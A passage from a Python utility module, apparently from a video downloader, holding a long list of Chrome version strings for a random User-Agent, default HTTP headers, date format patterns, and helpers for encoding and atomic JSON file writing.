'72.0.3626.98',
'74.0.3694.3',
'73.0.3683.24',
'72.0.3626.97',
'72.0.3626.96',
'72.0.3626.95',
'73.0.3683.23',
'72.0.3626.94',
'73.0.3683.22',
'73.0.3683.21',
'72.0.3626.93',
'74.0.3694.2',
'72.0.3626.92',
'74.0.3694.1',
'74.0.3694.0',
'74.0.3693.6',
'73.0.3683.20',
'72.0.3626.91',
'74.0.3693.5',
'74.0.3693.4',
'74.0.3693.3',
'74.0.3693.2',
'73.0.3683.19',
'74.0.3693.1',
'74.0.3693.0',
'73.0.3683.18',
'72.0.3626.90',
'74.0.3692.1',
'74.0.3692.0',
'73.0.3683.17',
'72.0.3626.89',
'74.0.3687.3',
'74.0.3691.1',
'74.0.3691.0',
'73.0.3683.16',
'72.0.3626.88',
'72.0.3626.87',
'73.0.3683.15',
'74.0.3690.1',
'74.0.3690.0',
'73.0.3683.14',
'72.0.3626.86',
'73.0.3683.13',
'73.0.3683.12',
'74.0.3689.1',
'74.0.3689.0',
'73.0.3683.11',
'72.0.3626.85',
'73.0.3683.10',
'72.0.3626.84',
'73.0.3683.9',
'74.0.3688.1',
'74.0.3688.0',
'73.0.3683.8',
'72.0.3626.83',
'74.0.3687.2',
'74.0.3687.1',
'74.0.3687.0',
'73.0.3683.7',
'72.0.3626.82',
'74.0.3686.4',
'72.0.3626.81',
'74.0.3686.3',
'74.0.3686.2',
'74.0.3686.1',
'74.0.3686.0',
'73.0.3683.6',
'72.0.3626.80',
'74.0.3685.1',
'74.0.3685.0',
'73.0.3683.5',
'72.0.3626.79',
'74.0.3684.1',
'74.0.3684.0',
'73.0.3683.4',
'72.0.3626.78',
'72.0.3626.77',
'73.0.3683.3',
'73.0.3683.2',
'72.0.3626.76',
'73.0.3683.1',
'73.0.3683.0',
'72.0.3626.75',
'71.0.3578.141',
'73.0.3682.1',
'73.0.3682.0',
'72.0.3626.74',
'71.0.3578.140',
'73.0.3681.4',
'73.0.3681.3',
'73.0.3681.2',
'73.0.3681.1',
'73.0.3681.0',
'72.0.3626.73',
'71.0.3578.139',
'72.0.3626.72',
'72.0.3626.71',
'73.0.3680.1',
'73.0.3680.0',
'72.0.3626.70',
'71.0.3578.138',
'73.0.3678.2',
'73.0.3679.1',
'73.0.3679.0',
'72.0.3626.69',
'71.0.3578.137',
'73.0.3678.1',
'73.0.3678.0',
'71.0.3578.136',
'73.0.3677.1',
'73.0.3677.0',
'72.0.3626.68',
'72.0.3626.67',
'71.0.3578.135',
'73.0.3676.1',
'73.0.3676.0',
'73.0.3674.2',
'72.0.3626.66',
'71.0.3578.134',
'73.0.3674.1',
'73.0.3674.0',
'72.0.3626.65',
'71.0.3578.133',
'73.0.3673.2',
'73.0.3673.1',
'73.0.3673.0',
'72.0.3626.64',
'71.0.3578.132',
'72.0.3626.63',
'72.0.3626.62',
'72.0.3626.61',
'72.0.3626.60',
'73.0.3672.1',
'73.0.3672.0',
'72.0.3626.59',
'71.0.3578.131',
'73.0.3671.3',
'73.0.3671.2',
'73.0.3671.1',
'73.0.3671.0',
'72.0.3626.58',
'71.0.3578.130',
'73.0.3670.1',
'73.0.3670.0',
'72.0.3626.57',
'71.0.3578.129',
'73.0.3669.1',
'73.0.3669.0',
'72.0.3626.56',
'71.0.3578.128',
'73.0.3668.2',
'73.0.3668.1',
'73.0.3668.0',
'72.0.3626.55',
'71.0.3578.127',
'73.0.3667.2',
'73.0.3667.1',
'73.0.3667.0',
'72.0.3626.54',
'71.0.3578.126',
'73.0.3666.1',
'73.0.3666.0',
'72.0.3626.53',
'71.0.3578.125',
'73.0.3665.4',
'73.0.3665.3',
'72.0.3626.52',
'73.0.3665.2',
'73.0.3664.4',
'73.0.3665.1',
'73.0.3665.0',
'72.0.3626.51',
'71.0.3578.124',
'72.0.3626.50',
'73.0.3664.3',
'73.0.3664.2',
'73.0.3664.1',
'73.0.3664.0',
'73.0.3663.2',
'72.0.3626.49',
'71.0.3578.123',
'73.0.3663.1',
'73.0.3663.0',
'72.0.3626.48',
'71.0.3578.122',
'73.0.3662.1',
'73.0.3662.0',
'72.0.3626.47',
'71.0.3578.121',
'73.0.3661.1',
'72.0.3626.46',
'73.0.3661.0',
'72.0.3626.45',
'71.0.3578.120',
'73.0.3660.2',
'73.0.3660.1',
'73.0.3660.0',
'72.0.3626.44',
'71.0.3578.119',
'73.0.3659.1',
'73.0.3659.0',
'72.0.3626.43',
'71.0.3578.118',
'73.0.3658.1',
'73.0.3658.0',
'72.0.3626.42',
'71.0.3578.117',
'73.0.3657.1',
'73.0.3657.0',
'72.0.3626.41',
'71.0.3578.116',
'73.0.3656.1',
'73.0.3656.0',
'72.0.3626.40',
'71.0.3578.115',
'73.0.3655.1',
'73.0.3655.0',
'72.0.3626.39',
'71.0.3578.114',
'73.0.3654.1',
'73.0.3654.0',
'72.0.3626.38',
'71.0.3578.113',
'73.0.3653.1',
'73.0.3653.0',
'72.0.3626.37',
'71.0.3578.112',
'73.0.3652.1',
'73.0.3652.0',
'72.0.3626.36',
'71.0.3578.111',
'73.0.3651.1',
'73.0.3651.0',
'72.0.3626.35',
'71.0.3578.110',
'73.0.3650.1',
'73.0.3650.0',
'72.0.3626.34',
'71.0.3578.109',
'73.0.3649.1',
'73.0.3649.0',
'72.0.3626.33',
'71.0.3578.108',
'73.0.3648.2',
'73.0.3648.1',
'73.0.3648.0',
'72.0.3626.32',
'71.0.3578.107',
'73.0.3647.2',
'73.0.3647.1',
'73.0.3647.0',
'72.0.3626.31',
'71.0.3578.106',
'73.0.3635.3',
'73.0.3646.2',
'73.0.3646.1',
'73.0.3646.0',
'72.0.3626.30',
'71.0.3578.105',
'72.0.3626.29',
'73.0.3645.2',
'73.0.3645.1',
'73.0.3645.0',
'72.0.3626.28',
'71.0.3578.104',
'72.0.3626.27',
'72.0.3626.26',
'72.0.3626.25',
'72.0.3626.24',
'73.0.3644.0',
'73.0.3643.2',
'72.0.3626.23',
'71.0.3578.103',
'73.0.3643.1',
'73.0.3643.0',
'72.0.3626.22',
'71.0.3578.102',
'73.0.3642.1',
'73.0.3642.0',
'72.0.3626.21',
'71.0.3578.101',
'73.0.3641.1',
'73.0.3641.0',
'72.0.3626.20',
'71.0.3578.100',
'72.0.3626.19',
'73.0.3640.1',
'73.0.3640.0',
'72.0.3626.18',
'73.0.3639.1',
'71.0.3578.99',
'73.0.3639.0',
'72.0.3626.17',
'73.0.3638.2',
'72.0.3626.16',
'73.0.3638.1',
'73.0.3638.0',
'72.0.3626.15',
'71.0.3578.98',
'73.0.3635.2',
'71.0.3578.97',
'73.0.3637.1',
'73.0.3637.0',
'72.0.3626.14',
'71.0.3578.96',
'71.0.3578.95',
'72.0.3626.13',
'71.0.3578.94',
'73.0.3636.2',
'71.0.3578.93',
'73.0.3636.1',
'73.0.3636.0',
'72.0.3626.12',
'71.0.3578.92',
'73.0.3635.1',
'73.0.3635.0',
'72.0.3626.11',
'71.0.3578.91',
'73.0.3634.2',
'73.0.3634.1',
'73.0.3634.0',
'72.0.3626.10',
'71.0.3578.90',
'71.0.3578.89',
'73.0.3633.2',
'73.0.3633.1',
'73.0.3633.0',
'72.0.3610.4',
'72.0.3626.9',
'71.0.3578.88',
'73.0.3632.5',
'73.0.3632.4',
'73.0.3632.3',
'73.0.3632.2',
'73.0.3632.1',
'73.0.3632.0',
'72.0.3626.8',
'71.0.3578.87',
'73.0.3631.2',
'73.0.3631.1',
'73.0.3631.0',
'72.0.3626.7',
'71.0.3578.86',
'72.0.3626.6',
'73.0.3630.1',
'73.0.3630.0',
'72.0.3626.5',
'71.0.3578.85',
'72.0.3626.4',
'73.0.3628.3',
'73.0.3628.2',
'73.0.3629.1',
'73.0.3629.0',
'72.0.3626.3',
'71.0.3578.84',
'73.0.3628.1',
'73.0.3628.0',
'71.0.3578.83',
'73.0.3627.1',
'73.0.3627.0',
'72.0.3626.2',
'71.0.3578.82',
'71.0.3578.81',
'71.0.3578.80',
'72.0.3626.1',
'72.0.3626.0',
'71.0.3578.79',
'70.0.3538.124',
'71.0.3578.78',
'72.0.3623.4',
'72.0.3625.2',
'72.0.3625.1',
'72.0.3625.0',
'71.0.3578.77',
'70.0.3538.123',
'72.0.3624.4',
'72.0.3624.3',
'72.0.3624.2',
'71.0.3578.76',
'72.0.3624.1',
'72.0.3624.0',
'72.0.3623.3',
'71.0.3578.75',
'70.0.3538.122',
'71.0.3578.74',
'72.0.3623.2',
'72.0.3610.3',
'72.0.3623.1',
'72.0.3623.0',
'72.0.3622.3',
'72.0.3622.2',
'71.0.3578.73',
'70.0.3538.121',
'72.0.3622.1',
'72.0.3622.0',
'71.0.3578.72',
'70.0.3538.120',
'72.0.3621.1',
'72.0.3621.0',
'71.0.3578.71',
'70.0.3538.119',
'72.0.3620.1',
'72.0.3620.0',
'71.0.3578.70',
'70.0.3538.118',
'71.0.3578.69',
'72.0.3619.1',
'72.0.3619.0',
'71.0.3578.68',
'70.0.3538.117',
'71.0.3578.67',
'72.0.3618.1',
'72.0.3618.0',
'71.0.3578.66',
'70.0.3538.116',
'72.0.3617.1',
'72.0.3617.0',
'71.0.3578.65',
'70.0.3538.115',
'72.0.3602.3',
'71.0.3578.64',
'72.0.3616.1',
'72.0.3616.0',
'71.0.3578.63',
'70.0.3538.114',
'71.0.3578.62',
'72.0.3615.1',
'72.0.3615.0',
'71.0.3578.61',
'70.0.3538.113',
'72.0.3614.1',
'72.0.3614.0',
'71.0.3578.60',
'70.0.3538.112',
'72.0.3613.1',
'72.0.3613.0',
'71.0.3578.59',
'70.0.3538.111',
'72.0.3612.2',
'72.0.3612.1',
'72.0.3612.0',
'70.0.3538.110',
'71.0.3578.58',
'70.0.3538.109',
'72.0.3611.2',
'72.0.3611.1',
'72.0.3611.0',
'71.0.3578.57',
'70.0.3538.108',
'72.0.3610.2',
'71.0.3578.56',
'71.0.3578.55',
'72.0.3610.1',
'72.0.3610.0',
'71.0.3578.54',
'70.0.3538.107',
'71.0.3578.53',
'72.0.3609.3',
'71.0.3578.52',
'72.0.3609.2',
'71.0.3578.51',
'72.0.3608.5',
'72.0.3609.1',
'72.0.3609.0',
'71.0.3578.50',
'70.0.3538.106',
'72.0.3608.4',
'72.0.3608.3',
'72.0.3608.2',
'71.0.3578.49',
'72.0.3608.1',
'72.0.3608.0',
'70.0.3538.105',
'71.0.3578.48',
'72.0.3607.1',
'72.0.3607.0',
'71.0.3578.47',
'70.0.3538.104',
'72.0.3606.2',
'72.0.3606.1',
'72.0.3606.0',
'71.0.3578.46',
'70.0.3538.103',
'70.0.3538.102',
'72.0.3605.3',
'72.0.3605.2',
'72.0.3605.1',
'72.0.3605.0',
'71.0.3578.45',
'70.0.3538.101',
'71.0.3578.44',
'71.0.3578.43',
'70.0.3538.100',
'70.0.3538.99',
'71.0.3578.42',
'72.0.3604.1',
'72.0.3604.0',
'71.0.3578.41',
'70.0.3538.98',
'71.0.3578.40',
'72.0.3603.2',
'72.0.3603.1',
'72.0.3603.0',
'71.0.3578.39',
'70.0.3538.97',
'72.0.3602.2',
'71.0.3578.38',
'71.0.3578.37',
'72.0.3602.1',
'72.0.3602.0',
'71.0.3578.36',
'70.0.3538.96',
'72.0.3601.1',
'72.0.3601.0',
'71.0.3578.35',
'70.0.3538.95',
'72.0.3600.1',
'72.0.3600.0',
'71.0.3578.34',
'70.0.3538.94',
'72.0.3599.3',
'72.0.3599.2',
'72.0.3599.1',
'72.0.3599.0',
'71.0.3578.33',
'70.0.3538.93',
'72.0.3598.1',
'72.0.3598.0',
'71.0.3578.32',
'70.0.3538.87',
'72.0.3597.1',
'72.0.3597.0',
'72.0.3596.2',
'71.0.3578.31',
'70.0.3538.86',
'71.0.3578.30',
'71.0.3578.29',
'72.0.3596.1',
'72.0.3596.0',
'71.0.3578.28',
'70.0.3538.85',
'72.0.3595.2',
'72.0.3591.3',
'72.0.3595.1',
'72.0.3595.0',
'71.0.3578.27',
'70.0.3538.84',
'72.0.3594.1',
'72.0.3594.0',
'71.0.3578.26',
'70.0.3538.83',
'72.0.3593.2',
'72.0.3593.1',
'72.0.3593.0',
'71.0.3578.25',
'70.0.3538.82',
'72.0.3589.3',
'72.0.3592.2',
'72.0.3592.1',
'72.0.3592.0',
'71.0.3578.24',
'72.0.3589.2',
'70.0.3538.81',
'70.0.3538.80',
'72.0.3591.2',
'72.0.3591.1',
'72.0.3591.0',
'71.0.3578.23',
'70.0.3538.79',
'71.0.3578.22',
'72.0.3590.1',
'72.0.3590.0',
'71.0.3578.21',
'70.0.3538.78',
'70.0.3538.77',
'72.0.3589.1',
'72.0.3589.0',
'71.0.3578.20',
'70.0.3538.76',
'71.0.3578.19',
'70.0.3538.75',
'72.0.3588.1',
'72.0.3588.0',
'71.0.3578.18',
'70.0.3538.74',
'72.0.3586.2',
'72.0.3587.0',
'71.0.3578.17',
'70.0.3538.73',
'72.0.3586.1',
'72.0.3586.0',
'71.0.3578.16',
'70.0.3538.72',
'72.0.3585.1',
'72.0.3585.0',
'71.0.3578.15',
'70.0.3538.71',
'71.0.3578.14',
'72.0.3584.1',
'72.0.3584.0',
'71.0.3578.13',
'70.0.3538.70',
'72.0.3583.2',
'71.0.3578.12',
'72.0.3583.1',
'72.0.3583.0',
'71.0.3578.11',
'70.0.3538.69',
'71.0.3578.10',
'72.0.3582.0',
'72.0.3581.4',
'71.0.3578.9',
'70.0.3538.67',
'72.0.3581.3',
'72.0.3581.2',
'72.0.3581.1',
'72.0.3581.0',
'71.0.3578.8',
'70.0.3538.66',
'72.0.3580.1',
'72.0.3580.0',
'71.0.3578.7',
'70.0.3538.65',
'71.0.3578.6',
'72.0.3579.1',
'72.0.3579.0',
'71.0.3578.5',
'70.0.3538.64',
'71.0.3578.4',
'71.0.3578.3',
'71.0.3578.2',
'71.0.3578.1',
'71.0.3578.0',
'70.0.3538.63',
'69.0.3497.128',
'70.0.3538.62',
'70.0.3538.61',
'70.0.3538.60',
'70.0.3538.59',
'71.0.3577.1',
'71.0.3577.0',
'70.0.3538.58',
'69.0.3497.127',
'71.0.3576.2',
'71.0.3576.1',
'71.0.3576.0',
'70.0.3538.57',
'70.0.3538.56',
'71.0.3575.2',
'70.0.3538.55',
'69.0.3497.126',
'70.0.3538.54',
'71.0.3575.1',
'71.0.3575.0',
'71.0.3574.1',
'71.0.3574.0',
'70.0.3538.53',
'69.0.3497.125',
'70.0.3538.52',
'71.0.3573.1',
'71.0.3573.0',
'70.0.3538.51',
'69.0.3497.124',
'71.0.3572.1',
'71.0.3572.0',
'70.0.3538.50',
'69.0.3497.123',
'71.0.3571.2',
'70.0.3538.49',
'69.0.3497.122',
'71.0.3571.1',
'71.0.3571.0',
'70.0.3538.48',
'69.0.3497.121',
'71.0.3570.1',
'71.0.3570.0',
'70.0.3538.47',
'69.0.3497.120',
'71.0.3568.2',
'71.0.3569.1',
'71.0.3569.0',
'70.0.3538.46',
'69.0.3497.119',
'70.0.3538.45',
'71.0.3568.1',
'71.0.3568.0',
'70.0.3538.44',
'69.0.3497.118',
'70.0.3538.43',
'70.0.3538.42',
'71.0.3567.1',
'71.0.3567.0',
'70.0.3538.41',
'69.0.3497.117',
'71.0.3566.1',
'71.0.3566.0',
'70.0.3538.40',
'69.0.3497.116',
'71.0.3565.1',
'71.0.3565.0',
'70.0.3538.39',
'69.0.3497.115',
'71.0.3564.1',
'71.0.3564.0',
'70.0.3538.38',
'69.0.3497.114',
'71.0.3563.0',
'71.0.3562.2',
'70.0.3538.37',
'69.0.3497.113',
'70.0.3538.36',
'70.0.3538.35',
'71.0.3562.1',
'71.0.3562.0',
'70.0.3538.34',
'69.0.3497.112',
'70.0.3538.33',
'71.0.3561.1',
'71.0.3561.0',
'70.0.3538.32',
'69.0.3497.111',
'71.0.3559.6',
'71.0.3560.1',
'71.0.3560.0',
'71.0.3559.5',
'71.0.3559.4',
'70.0.3538.31',
'69.0.3497.110',
'71.0.3559.3',
'70.0.3538.30',
'69.0.3497.109',
'71.0.3559.2',
'71.0.3559.1',
'71.0.3559.0',
'70.0.3538.29',
'69.0.3497.108',
'71.0.3558.2',
'71.0.3558.1',
'71.0.3558.0',
'70.0.3538.28',
'69.0.3497.107',
'71.0.3557.2',
'71.0.3557.1',
'71.0.3557.0',
'70.0.3538.27',
'69.0.3497.106',
'71.0.3554.4',
'70.0.3538.26',
'71.0.3556.1',
'71.0.3556.0',
'70.0.3538.25',
'71.0.3554.3',
'69.0.3497.105',
'71.0.3554.2',
'70.0.3538.24',
'69.0.3497.104',
'71.0.3555.2',
'70.0.3538.23',
'71.0.3555.1',
'71.0.3555.0',
'70.0.3538.22',
'69.0.3497.103',
'71.0.3554.1',
'71.0.3554.0',
'70.0.3538.21',
'69.0.3497.102',
'71.0.3553.3',
'70.0.3538.20',
'69.0.3497.101',
'71.0.3553.2',
'69.0.3497.100',
'71.0.3553.1',
'71.0.3553.0',
'70.0.3538.19',
'69.0.3497.99',
'69.0.3497.98',
'69.0.3497.97',
'71.0.3552.6',
'71.0.3552.5',
'71.0.3552.4',
'71.0.3552.3',
'71.0.3552.2',
'71.0.3552.1',
'71.0.3552.0',
'70.0.3538.18',
'69.0.3497.96',
'71.0.3551.3',
'71.0.3551.2',
'71.0.3551.1',
'71.0.3551.0',
'70.0.3538.17',
'69.0.3497.95',
'71.0.3550.3',
'71.0.3550.2',
'71.0.3550.1',
'71.0.3550.0',
'70.0.3538.16',
'69.0.3497.94',
'71.0.3549.1',
'71.0.3549.0',
'70.0.3538.15',
'69.0.3497.93',
'69.0.3497.92',
'71.0.3548.1',
'71.0.3548.0',
'70.0.3538.14',
'69.0.3497.91',
'71.0.3547.1',
'71.0.3547.0',
'70.0.3538.13',
'69.0.3497.90',
'71.0.3546.2',
'69.0.3497.89',
'71.0.3546.1',
'71.0.3546.0',
'70.0.3538.12',
'69.0.3497.88',
'71.0.3545.4',
'71.0.3545.3',
'71.0.3545.2',
'71.0.3545.1',
'71.0.3545.0',
'70.0.3538.11',
'69.0.3497.87',
'71.0.3544.5',
'71.0.3544.4',
'71.0.3544.3',
'71.0.3544.2',
'71.0.3544.1',
'71.0.3544.0',
'69.0.3497.86',
'70.0.3538.10',
'69.0.3497.85',
'70.0.3538.9',
'69.0.3497.84',
'71.0.3543.4',
'70.0.3538.8',
'71.0.3543.3',
'71.0.3543.2',
'71.0.3543.1',
'71.0.3543.0',
'70.0.3538.7',
'69.0.3497.83',
'71.0.3542.2',
'71.0.3542.1',
'71.0.3542.0',
'70.0.3538.6',
'69.0.3497.82',
'69.0.3497.81',
'71.0.3541.1',
'71.0.3541.0',
'70.0.3538.5',
'69.0.3497.80',
'71.0.3540.1',
'71.0.3540.0',
'70.0.3538.4',
'69.0.3497.79',
'70.0.3538.3',
'71.0.3539.1',
'71.0.3539.0',
'69.0.3497.78',
'68.0.3440.134',
'69.0.3497.77',
'70.0.3538.2',
'70.0.3538.1',
'70.0.3538.0',
'69.0.3497.76',
'68.0.3440.133',
'69.0.3497.75',
'70.0.3537.2',
'70.0.3537.1',
'70.0.3537.0',
'69.0.3497.74',
'68.0.3440.132',
'70.0.3536.0',
'70.0.3535.5',
'70.0.3535.4',
'70.0.3535.3',
'69.0.3497.73',
'68.0.3440.131',
'70.0.3532.8',
'70.0.3532.7',
'69.0.3497.72',
'69.0.3497.71',
'70.0.3535.2',
'70.0.3535.1',
'70.0.3535.0',
'69.0.3497.70',
'68.0.3440.130',
'69.0.3497.69',
'68.0.3440.129',
'70.0.3534.4',
'70.0.3534.3',
'70.0.3534.2',
'70.0.3534.1',
'70.0.3534.0',
'69.0.3497.68',
'68.0.3440.128',
'70.0.3533.2',
'70.0.3533.1',
'70.0.3533.0',
'69.0.3497.67',
'68.0.3440.127',
'70.0.3532.6',
'70.0.3532.5',
'70.0.3532.4',
'69.0.3497.66',
'68.0.3440.126',
'70.0.3532.3',
'70.0.3532.2',
'70.0.3532.1',
'69.0.3497.60',
'69.0.3497.65',
'69.0.3497.64',
'70.0.3532.0',
'70.0.3531.0',
'70.0.3530.4',
'70.0.3530.3',
'70.0.3530.2',
'69.0.3497.58',
'68.0.3440.125',
'69.0.3497.57',
'69.0.3497.56',
'69.0.3497.55',
'69.0.3497.54',
'70.0.3530.1',
'70.0.3530.0',
'69.0.3497.53',
'68.0.3440.124',
'69.0.3497.52',
'70.0.3529.3',
'70.0.3529.2',
'70.0.3529.1',
'70.0.3529.0',
'69.0.3497.51',
'70.0.3528.4',
'68.0.3440.123',
'70.0.3528.3',
'70.0.3528.2',
'70.0.3528.1',
'70.0.3528.0',
'69.0.3497.50',
'68.0.3440.122',
'70.0.3527.1',
'70.0.3527.0',
'69.0.3497.49',
'68.0.3440.121',
'70.0.3526.1',
'70.0.3526.0',
'68.0.3440.120',
'69.0.3497.48',
'69.0.3497.47',
'68.0.3440.119',
'68.0.3440.118',
'70.0.3525.5',
'70.0.3525.4',
'70.0.3525.3',
'68.0.3440.117',
'69.0.3497.46',
'70.0.3525.2',
'70.0.3525.1',
'70.0.3525.0',
'69.0.3497.45',
'68.0.3440.116',
'70.0.3524.4',
'70.0.3524.3',
'69.0.3497.44',
'70.0.3524.2',
'70.0.3524.1',
'70.0.3524.0',
'70.0.3523.2',
'69.0.3497.43',
'68.0.3440.115',
'70.0.3505.9',
'69.0.3497.42',
'70.0.3505.8',
'70.0.3523.1',
'70.0.3523.0',
'69.0.3497.41',
'68.0.3440.114',
'70.0.3505.7',
'69.0.3497.40',
'70.0.3522.1',
'70.0.3522.0',
'70.0.3521.2',
'69.0.3497.39',
'68.0.3440.113',
'70.0.3505.6',
'70.0.3521.1',
'70.0.3521.0',
'69.0.3497.38',
'68.0.3440.112',
'70.0.3520.1',
'70.0.3520.0',
'69.0.3497.37',
'68.0.3440.111',
'70.0.3519.3',
'70.0.3519.2',
'70.0.3519.1',
'70.0.3519.0',
'69.0.3497.36',
'68.0.3440.110',
'70.0.3518.1',
'70.0.3518.0',
'69.0.3497.35',
'69.0.3497.34',
'68.0.3440.109',
'70.0.3517.1',
'70.0.3517.0',
'69.0.3497.33',
'68.0.3440.108',
'69.0.3497.32',
'70.0.3516.3',
'70.0.3516.2',
'70.0.3516.1',
'70.0.3516.0',
'69.0.3497.31',
'68.0.3440.107',
'70.0.3515.4',
'68.0.3440.106',
'70.0.3515.3',
'70.0.3515.2',
'70.0.3515.1',
'70.0.3515.0',
'69.0.3497.30',
'68.0.3440.105',
'68.0.3440.104',
'70.0.3514.2',
'70.0.3514.1',
'70.0.3514.0',
'69.0.3497.29',
'68.0.3440.103',
'70.0.3513.1',
'70.0.3513.0',
'69.0.3497.28',
)
return _USER_AGENT_TPL % random.choice(_CHROME_VERSIONS)
# Default HTTP headers attached to outgoing requests; the User-Agent is
# randomised once per process via random_user_agent().
std_headers = {
    'User-Agent': random_user_agent(),
    'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-us,en;q=0.5',
}


# Named alternative User-Agent strings for sites that need a specific browser.
USER_AGENTS = {
    'Safari': 'Mozilla/5.0 (X11; Linux x86_64; rv:10.0) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
}


# Sentinel distinguishing "no default supplied" from an explicit None default.
NO_DEFAULT = object()

ENGLISH_MONTH_NAMES = [
    'January', 'February', 'March', 'April', 'May', 'June',
    'July', 'August', 'September', 'October', 'November', 'December']

# Month names per language code, used when parsing localised dates.
MONTH_NAMES = {
    'en': ENGLISH_MONTH_NAMES,
    'fr': [
        'janvier', 'février', 'mars', 'avril', 'mai', 'juin',
        'juillet', 'août', 'septembre', 'octobre', 'novembre', 'décembre'],
}

# Media container/codec file extensions recognised when guessing formats.
KNOWN_EXTENSIONS = (
    'mp4', 'm4a', 'm4p', 'm4b', 'm4r', 'm4v', 'aac',
    'flv', 'f4v', 'f4a', 'f4b',
    'webm', 'ogg', 'ogv', 'oga', 'ogx', 'spx', 'opus',
    'mkv', 'mka', 'mk3d',
    'avi', 'divx',
    'mov',
    'asf', 'wmv', 'wma',
    '3gp', '3g2',
    'mp3',
    'flac',
    'ape',
    'wav',
    'f4f', 'f4m', 'm3u8', 'smil')

# needed for sanitizing filenames in restricted mode
# (maps each accented character to its closest ASCII transliteration)
ACCENT_CHARS = dict(zip('ÂÃÄÀÁÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖŐØŒÙÚÛÜŰÝÞßàáâãäåæçèéêëìíîïðñòóôõöőøœùúûüűýþÿ',
                        itertools.chain('AAAAAA', ['AE'], 'CEEEEIIIIDNOOOOOOO', ['OE'], 'UUUUUY', ['TH', 'ss'],
                                        'aaaaaa', ['ae'], 'ceeeeiiiionooooooo', ['oe'], 'uuuuuy', ['th'], 'y')))
# strptime() patterns tried in order when parsing unambiguous date strings.
DATE_FORMATS = (
    '%d %B %Y',
    '%d %b %Y',
    '%B %d %Y',
    '%B %dst %Y',
    '%B %dnd %Y',
    '%B %drd %Y',
    '%B %dth %Y',
    '%b %d %Y',
    '%b %dst %Y',
    '%b %dnd %Y',
    '%b %drd %Y',
    '%b %dth %Y',
    '%b %dst %Y %I:%M',
    '%b %dnd %Y %I:%M',
    '%b %drd %Y %I:%M',
    '%b %dth %Y %I:%M',
    '%Y %m %d',
    '%Y-%m-%d',
    '%Y/%m/%d',
    '%Y/%m/%d %H:%M',
    '%Y/%m/%d %H:%M:%S',
    '%Y-%m-%d %H:%M',
    '%Y-%m-%d %H:%M:%S',
    '%Y-%m-%d %H:%M:%S.%f',
    '%Y-%m-%d %H:%M:%S:%f',
    '%d.%m.%Y %H:%M',
    '%d.%m.%Y %H.%M',
    '%Y-%m-%dT%H:%M:%SZ',
    '%Y-%m-%dT%H:%M:%S.%fZ',
    '%Y-%m-%dT%H:%M:%S.%f0Z',
    '%Y-%m-%dT%H:%M:%S',
    '%Y-%m-%dT%H:%M:%S.%f',
    '%Y-%m-%dT%H:%M',
    '%b %d %Y at %H:%M',
    '%b %d %Y at %H:%M:%S',
    '%B %d %Y at %H:%M',
    '%B %d %Y at %H:%M:%S',
)

# Variants preferring day-first (e.g. European) numeric dates.
DATE_FORMATS_DAY_FIRST = list(DATE_FORMATS)
DATE_FORMATS_DAY_FIRST.extend([
    '%d-%m-%Y',
    '%d.%m.%Y',
    '%d.%m.%y',
    '%d/%m/%Y',
    '%d/%m/%y',
    '%d/%m/%Y %H:%M:%S',
])

# Variants preferring month-first (e.g. US) numeric dates.
DATE_FORMATS_MONTH_FIRST = list(DATE_FORMATS)
DATE_FORMATS_MONTH_FIRST.extend([
    '%m-%d-%Y',
    '%m.%d.%Y',
    '%m/%d/%Y',
    '%m/%d/%y',
    '%m/%d/%Y %H:%M:%S',
])

# Matches the trailer of P.A.C.K.E.R.-obfuscated JavaScript so it can be unpacked.
PACKED_CODES_RE = r"}\('(.+)',(\d+),(\d+),'([^']+)'\.split\('\|'\)"

# Extracts the body of <script type="application/ld+json"> blocks.
JSON_LD_RE = r'(?is)<script[^>]+type=(["\']?)application/ld\+json\1[^>]*>(?P<json_ld>.+?)</script>'
def preferredencoding():
    """Get preferred encoding.

    Returns the best encoding scheme for the system, based on
    locale.getpreferredencoding() and some further tweaks.
    """
    try:
        encoding = locale.getpreferredencoding()
        # Probe the codec: the locale may report an encoding this
        # Python build cannot actually encode with.
        'TEST'.encode(encoding)
    except Exception:
        encoding = 'UTF-8'
    return encoding
def write_json_file(obj, fn):
    """ Encode obj as JSON and write it to fn, atomically if possible """
    fn = encodeFilename(fn)
    if sys.version_info < (3, 0) and sys.platform != 'win32':
        encoding = get_filesystem_encoding()
        # os.path.basename returns a bytes object, but NamedTemporaryFile
        # will fail if the filename contains non ascii characters unless we
        # use a unicode object
        path_basename = lambda f: os.path.basename(fn).decode(encoding)
        # the same for os.path.dirname
        path_dirname = lambda f: os.path.dirname(fn).decode(encoding)
    else:
        path_basename = os.path.basename
        path_dirname = os.path.dirname
    # Create the temp file next to the target so the final os.rename()
    # is a same-filesystem (atomic) rename.
    args = {
        'suffix': '.tmp',
        'prefix': path_basename(fn) + '.',
        'dir': path_dirname(fn),
        'delete': False,
    }
    # In Python 2.x, json.dump expects a bytestream.
    # In Python 3.x, it writes to a character stream
    if sys.version_info < (3, 0):
        args['mode'] = 'wb'
    else:
        args.update({
            'mode': 'w',
            'encoding': 'utf-8',
        })
    tf = tempfile.NamedTemporaryFile(**compat_kwargs(args))
    try:
        with tf:
            # default=repr: unserializable values fall back to their repr()
            # instead of failing the whole write.
            json.dump(obj, tf, default=repr)
        if sys.platform == 'win32':
            # Need to remove existing file on Windows, else os.rename raises
            # WindowsError or FileExistsError.
            try:
                os.unlink(fn)
            except OSError:
                pass
        try:
            # NamedTemporaryFile creates the file 0600; re-apply the
            # process umask so permissions match a normally created file.
            mask = os.umask(0)
            os.umask(mask)
            os.chmod(tf.name, 0o666 & ~mask)
        except OSError:
            pass
        os.rename(tf.name, fn)
    except Exception:
        # Best-effort cleanup of the temp file before re-raising.
        try:
            os.remove(tf.name)
        except OSError:
            pass
        raise
# find_xpath_attr: on Python >= 2.7 ElementTree supports [@attr='val']
# predicates natively; on 2.6 matching elements must be scanned manually.
if sys.version_info >= (2, 7):
    def find_xpath_attr(node, xpath, key, val=None):
        """ Find the xpath xpath[@key=val] """
        # Only simple attribute names are allowed — `key` is interpolated
        # into the xpath expression below.
        assert re.match(r'^[a-zA-Z_-]+$', key)
        expr = xpath + ('[@%s]' % key if val is None else "[@%s='%s']" % (key, val))
        return node.find(expr)
else:
    def find_xpath_attr(node, xpath, key, val=None):
        # Python 2.6 fallback: scan all matches of `xpath` for the attribute.
